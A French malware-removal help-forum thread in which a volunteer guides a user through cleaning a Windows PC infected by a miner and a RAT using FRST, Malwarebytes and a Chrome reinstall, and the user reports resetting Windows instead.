addition : https://pjjoint.malekal.com/files.php?i ... q12v14x8v5

ça vas pas du tout la malwarebyte ne s'execute pas le pc redemarre tout seul ... un formatage s'impose je crois :(
Avatar de l’utilisateur
angelique
Messages : 32263
Inscription : 28 févr. 2008 13:58
Localisation : Breizhilienne

Re: [résolu]internet explorer qui s'ouvre tout seul

par angelique »

Bonjour/Bonsoir

Chrome:
-----------

Enlever la synchronisation de tout, préférences, etc. de chrome ➯ https://www.malekal.com/reparer-google- ... gle_Chrome

voir https://www.malekal.com/synchroniser-google-chrome/ partie Paramètres de la synchronisation Chrome

Exporte tes favoris : https://support.google.com/chrome/answer/96816?hl=fr
Désinstalle Google Chrome depuis le panneau de configuration et programmes et fonctionnalités (ou désinstaller programmes).
A la désinstallation coche l'option de suppression des profils.


---------


Image Télécharge à coté de FRST.EXE , PAS AILLEURS !!!!! le fichier fixlist.txt en pièce jointe en bas du message.

➯ Relance FRST(clic droit exécuter en tant qu'administrateur) et clic sur le bouton corriger/fix
Un redémarrage peut être nécessaire (pas obligatoire).
Un fichier texte apparaît, copie/colle le contenu ici dans un nouveau message avec ton commentaire.

---------------

- Désinstalle YoutubeAdBlock (HKLM-x32\...\E3605470-291B-44EB-8648-745EE356599A) (Version: 2.0.0.537 - Company Inc.)

- Télécharge et Réinstalle Google Chrome http://telecharger.malekal.com/download/google-chrome/

- Fait le scan MalwareBytes et corrige la sélection trouvée
Vous ne pouvez pas consulter les pièces jointes insérées à ce message.
Avec Gnu_Linux t'as un Noyau ... avec Ѡindows t'as que les pépins
https://helicium.altervista.org/
Supprimer les "virus" gratuitement http://www.supprimer-trojan.com/
Un p'tit Don à Angélique PDT_018 Merci.
Image
amine1989

Re: internet explorer qui s'ouvre tout seul

par amine1989 »

mrc bcp pout tout mais j'ai fais la reinitialisation de mon pc car j'ai windows 10 tout est nickel maintenant je ferai gaffe a ne pas installer n'importe quoi sur ma machine cette fois si .. encore mrc bcp de votre professionnalisme !
Avatar de l’utilisateur
angelique
Messages : 32263
Inscription : 28 févr. 2008 13:58
Localisation : Breizhilienne

Re: internet explorer qui s'ouvre tout seul

par angelique »

Ok pas plus mal , vue toutes les merdouilles, Miner , Trojan RAT donc change quand même tous tes mots de passe (bank, mail, web, etc....)
Avec Gnu_Linux t'as un Noyau ... avec Ѡindows t'as que les pépins
https://helicium.altervista.org/
Supprimer les "virus" gratuitement http://www.supprimer-trojan.com/
Un p'tit Don à Angélique PDT_018 Merci.
Image
  • Sujets similaires
    Réponses
    Vues
    Dernier message

Revenir à « Discussions/Aides Antivirus »